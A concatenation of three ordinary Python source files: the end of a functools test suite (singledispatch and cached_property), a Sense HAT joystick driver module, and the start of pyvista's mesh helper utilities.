self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with threading_helper.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
stick.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Alternative API for the Sense HAT
# Copyright (c) 2016-2018 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Defines the :class:`SenseStick` class representing the Sense HAT's joystick.
"""
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
import io
import os
import glob
import errno
import struct
import select
import warnings
import termios
from datetime import datetime
from collections import namedtuple
from threading import Thread, Event, Lock
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
from .exc import SenseStickBufferFull, SenseStickCallbackRead
# native_str represents the "native" str type (bytes in Py 2, unicode in Py 3)
# of the interpreter; str is then redefined to always represent unicode
native_str = str # pylint: disable=invalid-name
str = type('') # pylint: disable=redefined-builtin,invalid-name
class StickEvent(namedtuple('StickEvent',
('timestamp', 'direction', 'pressed', 'held'))):
"""
Represents a joystick event as a :func:`~collections.namedtuple`. The
fields of the event are defined below:
.. attribute:: timestamp
A :class:`~datetime.datetime` object specifying when the event took
place. This timestamp is derived from the kernel event so it should be
accurate even when callbacks have taken time reacting to events. The
timestamp is a naive :class:`~datetime.datetime` object in local time.
.. attribute:: direction
A string indicating which direction the event pertains to. Can be one
of "up", "down", "leftʺ, "right", or "enter" (the last event refers to
the joystick being pressed inward).
.. attribute:: pressed
A bool which is ``True`` when the event indicates that the joystick is
being pressed *or held* in the specified direction. When this is
``False``, the event indicates that the joystick has been released from
the specified direction.
.. attribute:: held
A bool which is ``True`` when the event indicates that the joystick
direction is currently held down (when :attr:`pressed` is also
``True``) or that the direction was *previously* held down (when
:attr:`pressed` is ``False`` buut :attr:`held` is still ``True``).
"""
__slots__ = ()
class SenseStick(object):
"""
The :class:`SenseStick` class represents the joystick on the Sense HAT.
Users can either instantiate this class themselves, or can access an
instance from :attr:`SenseHAT.stick`.
The :meth:`read` method can be called to obtain :class:`StickEvent`
instances, or the instance can be treated as an iterator in which case
events will be yielded as they come in::
hat = SenseHAT()
for event in hat.stick:
if event.pressed and not event.held:
print('%s pressed!' % event.direction)
Alternatively, handler functions can be assigned to the attributes
:attr:`when_up`, :attr:`when_down`, :attr:`when_left`, :attr:`when_right`,
:attr:`when_enter`. The assigned functions will be called when any matching
event occurs.
Finally, the attributes :attr:`up`, :attr:`down`, :attr:`left`,
:attr:`right`, and attr:`enter` can be polled to determine the current
state of the joystick.
The :attr:`rotation` attribute can be modified to alter the orientation of
events, and the aforementioned attributes.
The *max_events* parameter controls the size of the internal queue used to
buffer joystick events. This defaults to 100 which should be more than
sufficient to ensure events are not lost. The *flush_input* parameter,
which defaults to ``True`` controls whether, when the instance is closed,
it attempts to flush the stdin of the owning terminal. This is useful as
the joystick also acts as a keyboard. On the command line, this can mean
that joystick movements (buffered during a script's execution) can
inadvertently execute historical commands (e.g. Up a few times followed by
Enter).
Finally, if the *emulate* parameter is ``True``, the instance will connect
to the joystick in the `desktop Sense HAT emulator`_ instead of the "real"
Sense HAT joystick.
.. _desktop Sense HAT emulator: https://sense-emu.readthedocs.io/
"""
# pylint: disable=too-many-instance-attributes
__slots__ = (
'_flush',
'_callbacks_lock',
'_callbacks_close',
'_callbacks',
'_callbacks_thread',
'_closing',
'_stream',
'_buffer',
'_read_thread',
'_pressed',
'_held',
'_rotation',
'_rot_map',
)
SENSE_HAT_EVDEV_NAME = 'Raspberry Pi Sense HAT Joystick'
EVENT_FORMAT = native_str('llHHI')
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)
EV_KEY = 0x01
STATE_RELEASE = 0
STATE_PRESS = 1
STATE_HOLD = 2
KEY_UP = 103
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_DOWN = 108
KEY_ENTER = 28
def __init__(self, max_events=100, flush_input=True, emulate=False):
self._flush = flush_input
self._callbacks_lock = Lock()
self._callbacks_close = Event()
self._callbacks = {}
self._callbacks_thread = None
self._closing = Event()
self._stream = False
self._buffer = Queue(maxsize=max_events)
if emulate:
from sense_emu.stick import init_stick_client
stick_file = init_stick_client()
else:
stick_file = io.open(self._stick_device(), 'rb', buffering=0)
self._read_thread = Thread(target=self._read_stick, args=(stick_file,))
self._read_thread.daemon = True
self._read_thread.start()
# This is just a guess; we can't know the actual joystick state at
# initialization. However, if it's incorrect, future events should
# correct this
self._pressed = set()
self._held = set()
self._rotation = 0
self._rot_map = {
SenseStick.KEY_UP: SenseStick.KEY_RIGHT,
SenseStick.KEY_LEFT: SenseStick.KEY_UP,
SenseStick.KEY_DOWN: SenseStick.KEY_LEFT,
SenseStick.KEY_RIGHT: SenseStick.KEY_DOWN,
SenseStick.KEY_ENTER: SenseStick.KEY_ENTER,
}
def close(self):
"""
Call the :meth:`close` method to close the joystick interface and free
up any background resources. The method is idempotent (you can call it
multiple times without error) and after it is called, any operations on
the joystick may return an error (but are not guaranteed to do so).
"""
if self._read_thread is not None:
self._closing.set()
self._read_thread.join()
if self._callbacks_thread:
self._callbacks_thread.join()
self._read_thread = None
self._callbacks_thread = None
self._buffer = None
if self._flush:
self._flush = False
try:
termios.tcflush(0, termios.TCIFLUSH)
except termios.error:
# If stdin isn't a tty (or isn't available), ignore the error
pass
def __iter__(self):
while True:
yield self.read(0 if self._stream else None)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@staticmethod
def _stick_device():
for evdev in glob.glob('/sys/class/input/event*'):
try:
with io.open(os.path.join(evdev, 'device', 'name'), 'r') as f:
if f.read().strip() == SenseStick.SENSE_HAT_EVDEV_NAME:
return os.path.join('/dev', 'input', os.path.basename(evdev))
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
raise RuntimeError('unable to locate SenseHAT joystick device')
def _read_stick(self, stick_file):
try:
while not self._closing.wait(0):
if select.select([stick_file], [], [], 0.1)[0]:
event = stick_file.read(SenseStick.EVENT_SIZE)
if event == b'':
# This is mostly to ease testing, but also deals with
# some edge cases
break
(
tv_sec,
tv_usec,
evt_type,
code,
value,
) = struct.unpack(SenseStick.EVENT_FORMAT, event)
if evt_type == SenseStick.EV_KEY:
if self._buffer.full():
warnings.warn(SenseStickBufferFull(
"The internal SenseStick buffer is full; "
"try reading some events!"))
self._buffer.get()
r = self._rotation
while r:
code = self._rot_map[code]
r -= 90
evt = StickEvent(
timestamp=datetime.fromtimestamp(
tv_sec + (tv_usec / 1000000)
),
direction={
SenseStick.KEY_UP: 'up',
SenseStick.KEY_DOWN: 'down',
SenseStick.KEY_LEFT: 'left',
SenseStick.KEY_RIGHT: 'right',
SenseStick.KEY_ENTER: 'enter',
}[code],
pressed=(value != SenseStick.STATE_RELEASE),
held=(value == SenseStick.STATE_HOLD or (
value == SenseStick.STATE_RELEASE and
code in self._held))
)
if not evt.pressed:
self._pressed -= {code}
self._held -= {code}
elif evt.held:
self._pressed |= {code} # to correct state
self._held |= {code}
else: # pressed
self._pressed |= {code}
self._held -= {code} # to correct state
# Only push event onto the queue once the internal
# state is updated; this ensures the various read-only
# properties will be accurate for event handlers that
# subsequently fire (although if they take too long the
# state may change again before the next handler fires)
self._buffer.put(evt)
finally:
stick_file.close()
def _run_callbacks(self):
while not self._callbacks_close.wait(0) and not self._closing.wait(0):
try:
event = self._buffer.get(timeout=0.1)
except Empty:
pass
else:
with self._callbacks_lock:
try:
callback = self._callbacks[event.direction]
except KeyError:
callback = None
if callback is not None:
callback(event)
def _start_stop_callbacks(self):
with self._callbacks_lock:
if self._callbacks and not self._callbacks_thread:
self._callbacks_close.clear()
self._callbacks_thread = Thread(target=self._run_callbacks)
self._callbacks_thread.daemon = True
self._callbacks_thread.start()
elif not self._callbacks and self._callbacks_thread:
self._callbacks_close.set()
self._callbacks_thread.join()
self._callbacks_thread = None
@property
def rotation(self):
"""
Specifies the rotation (really, the orientation) of the joystick as a
multiple of 90 degrees. When rotation is 0 (the default), "up" is
toward the GPIO pins:
.. image:: images/rotation_0.*
When rotation is 90, "up" is towards the LEDs, and so on:
.. image:: images/rotation_90.*
The other two rotations are trivial to derive from this.
.. note::
This property is updated by the unifying :attr:`SenseHAT.rotation`
attribute.
"""
return self._rotation
@rotation.setter
def rotation(self, value):
# TODO If rotation is modified while _pressed and _held aren't empty
# then we potentially have bad state (unless it's just ENTER);
# technically we should anti-rotate their current values here...
if value % 90:
raise ValueError('rotation must be a multiple of 90')
self._rotation = value % 360
def read(self, timeout=None):
"""
Wait up to *timeout* seconds for another joystick event. If one occurs,
return it as a :class:`StickEvent`, otherwise return ``None``.
.. note::
Attempting to call this method when callbacks are assigned to
attributes like :attr:`when_left` will trigger a
:exc:`SenseStickCallbackRead` warning. This is because using the
callback mechanism causes a background thread to continually read
joystick events (removing them from the queue that :meth:`read`
accesses). Mixing these programming styles can result in missing
events.
"""
if self._callbacks_thread is not None:
warnings.warn(SenseStickCallbackRead(
'read called while when_* callbacks are assigned'))
try:
return self._buffer.get(timeout=timeout)
except Empty:
return None
@property
def stream(self):
"""
When ``True``, treating the joystick as an iterator will always yield
immediately (yielding ``None`` if no event has occurred). When
``False`` (the default), the iterator will only yield when an event
has occurred.
.. note::
This property can be set while an iterator is active, but if the
current value is ``False``, the iterator will wait indefinitely
for the next event *before* it will start returning ``None``. It
is better to set this property *prior* to obtaining the iterator.
"""
return self._stream
@stream.setter
def stream(self, value):
self._stream = bool(value)
@property
def up(self):
"""
Returns ``True`` if the joystick is currently pressed upward.
"""
# pylint: disable=invalid-name
return SenseStick.KEY_UP in self._pressed
@property
def up_held(self):
"""
Returns ``True`` if the joystick is currently held upward.
"""
return SenseStick.KEY_UP in self._held
@property
def when_up(self):
"""
The function to call when the joystick is moved upward.
"""
with self._callbacks_lock:
return self._callbacks.get('up')
@when_up.setter
def when_up(self, value):
with self._callbacks_lock:
if value:
self._callbacks['up'] = value
else:
self._callbacks.pop('up', None)
self._start_stop_callbacks()
@property
def down(self):
"""
Returns ``True`` if the joystick is currently pressed downward.
"""
return SenseStick.KEY_DOWN in self._pressed
@property
def down_held(self):
"""
Returns ``True`` if the joystick is currently held downward.
"""
return SenseStick.KEY_DOWN in self._held
@property
def when_down(self):
"""
The function to call when the joystick is moved downward.
"""
with self._callbacks_lock:
return self._callbacks.get('down')
@when_down.setter
def when_down(self, value):
with self._callbacks_lock:
if value:
self._callbacks['down'] = value
else:
self._callbacks.pop('down', None)
self._start_stop_callbacks()
@property
def left(self):
"""
Returns ``True`` if the joystick is currently pressed leftward.
"""
return SenseStick.KEY_LEFT in self._pressed
@property
def left_held(self):
"""
Returns ``True`` if the joystick is currently held leftward.
"""
return SenseStick.KEY_LEFT in self._held
@property
def when_left(self):
"""
The function to call when the joystick is moved leftward.
"""
with self._callbacks_lock:
return self._callbacks.get('left')
@when_left.setter
def when_left(self, value):
with self._callbacks_lock:
if value:
self._callbacks['left'] = value
else:
self._callbacks.pop('left', None)
self._start_stop_callbacks()
@property
def right(self):
"""
Returns ``True`` if the joystick is currently pressed rightward.
"""
return SenseStick.KEY_RIGHT in self._pressed
@property
def right_held(self):
"""
Returns ``True`` if the joystick is currently held rightward.
"""
return SenseStick.KEY_RIGHT in self._held
@property
def when_right(self):
"""
The function to call when the joystick is moved rightward.
"""
with self._callbacks_lock:
return self._callbacks.get('right')
@when_right.setter
def when_right(self, value):
with self._callbacks_lock:
if value:
self._callbacks['right'] = value
else:
self._callbacks.pop('right', None)
self._start_stop_callbacks()
@property
def enter(self):
"""
Returns ``True`` if the joystick is currently pressed inward.
"""
return SenseStick.KEY_ENTER in self._pressed
@property
def enter_held(self):
"""
Returns ``True`` if the joystick is currently held inward.
"""
return SenseStick.KEY_ENTER in self._held
@property
def when_enter(self):
"""
The function to call when the joystick is pressed in or released.
"""
with self._callbacks_lock:
return self._callbacks.get('enter')
@when_enter.setter
def when_enter(self, value):
with self._callbacks_lock:
if value:
self._callbacks['enter'] = value
else:
self._callbacks.pop('enter', None)
self._start_stop_callbacks()
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import collections.abc
import enum
import logging
import os
import signal
import sys
import threading
from threading import Thread
import traceback
from typing import Optional
import warnings
import numpy as np
import pyvista
from pyvista import _vtk
from pyvista.errors import AmbiguousDataError, MissingDataError
from . import transformations
from .fileio import from_meshio
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = _vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = _vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = _vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = _vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a given numpy data type.
Corrects for string type mapping issues.
Parameters
----------
typ : numpy.dtype
Numpy data type.
Returns
-------
int
Integer type id specified in ``vtkType.h``
"""
typ = _vtk.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array.
Parameters
----------
vtkarr_bint : vtk.vtkBitArray
VTK binary array.
Returns
-------
vtk.vtkCharArray
VTK char array.
Notes
-----
This performs a copy.
"""
vtkarr = _vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array.
Parameters
----------
vtk_id_list : vtk.vtkIdList
